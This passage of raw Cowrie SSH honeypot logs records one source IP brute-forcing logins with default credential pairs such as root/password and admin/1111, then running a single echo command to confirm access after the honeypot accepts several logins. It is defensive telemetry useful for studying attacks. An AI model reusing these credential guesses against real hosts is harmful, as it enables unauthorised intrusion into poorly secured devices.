nssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:36.906703Z","src_ip":"212.227.235.229","session":"43280dd4220b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:38.241598Z","src_ip":"212.227.235.229","session":"43280dd4220b"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:39.645689Z","src_ip":"212.227.235.229","session":"43280dd4220b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34118,"dst_ip":"1.2.3.4","dst_port":22,"session":"f65ad593d2c9","protocol":"ssh","message":"New connection: 212.227.235.229:34118 (1.2.3.4:22) [session: f65ad593d2c9]","sensor":"my-vps","timestamp":"2025-08-28T23:21:39.786226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:40.084586Z","src_ip":"212.227.235.229","session":"f65ad593d2c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:40.085278Z","src_ip":"212.227.235.229","session":"f65ad593d2c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0000","message":"login attempt [admin/0000] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:42.695297Z","src_ip":"212.227.235.229","session":"f65ad593d2c9"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:44.088904Z","src_ip":"212.227.235.229","session":"f65ad593d2c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52820,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d1aae68107e","protocol":"ssh","message":"New connection: 212.227.235.229:52820 (1.2.3.4:22) [session: 1d1aae68107e]","sensor":"my-vps","timestamp":"2025-08-28T23:21:44.230043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:44.565250Z","src_ip":"212.227.235.229","session":"1d1aae68107e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:45.102610Z","src_ip":"212.227.235.229","session":"1d1aae68107e"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:46.318718Z","src_ip":"212.227.235.229","session":"1d1aae68107e"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:47.696892Z","src_ip":"212.227.235.229","session":"1d1aae68107e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38548,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa6f2c631410","protocol":"ssh","message":"New connection: 212.227.235.229:38548 (1.2.3.4:22) [session: fa6f2c631410]","sensor":"my-vps","timestamp":"2025-08-28T23:21:47.792750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:47.931251Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:47.932061Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:48.567434Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:48.844341Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:48.845150Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:49.034278Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:49.035171Z","src_ip":"212.227.235.229","session":"fa6f2c631410"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47374,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f78a77259e2","protocol":"ssh","message":"New connection: 212.227.235.229:47374 (1.2.3.4:22) [session: 4f78a77259e2]","sensor":"my-vps","timestamp":"2025-08-28T23:21:49.139581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:49.158936Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:49.274054Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:49.895701Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:50.247373Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:50.248282Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:50.500150Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:50.501426Z","src_ip":"212.227.235.229","session":"4f78a77259e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56816,"dst_ip":"1.2.3.4","dst_port":22,"session":"c83abc9db4d2","protocol":"ssh","message":"New connection: 212.227.235.229:56816 (1.2.3.4:22) [session: c83abc9db4d2]","sensor":"my-vps","timestamp":"2025-08-28T23:21:50.638003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:50.858041Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:50.859237Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:51.994542Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:53.157974Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:53.158733Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:53.385334Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:53.386427Z","src_ip":"212.227.235.229","session":"c83abc9db4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44390,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcdc9d62eeab","protocol":"ssh","message":"New connection: 212.227.235.229:44390 (1.2.3.4:22) [session: bcdc9d62eeab]","sensor":"my-vps","timestamp":"2025-08-28T23:21:53.495316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:54.343403Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:54.344338Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:55.702904Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:56.271934Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:56.272713Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:56.413167Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:56.414377Z","src_ip":"212.227.235.229","session":"bcdc9d62eeab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58564,"dst_ip":"1.2.3.4","dst_port":22,"session":"f100600d410c","protocol":"ssh","message":"New connection: 212.227.235.229:58564 (1.2.3.4:22) [session: f100600d410c]","sensor":"my-vps","timestamp":"2025-08-28T23:21:56.536372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:56.577689Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:56.669025Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:57.231014Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:57.654428Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:57.655131Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:57.950191Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:57.951612Z","src_ip":"212.227.235.229","session":"f100600d410c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38484,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2389b428752","protocol":"ssh","message":"New connection: 212.227.235.229:38484 (1.2.3.4:22) [session: b2389b428752]","sensor":"my-vps","timestamp":"2025-08-28T23:21:58.076349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:58.204537Z","src_ip":"212.227.235.229","session":"b2389b428752"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:58.205254Z","src_ip":"212.227.235.229","session":"b2389b428752"}
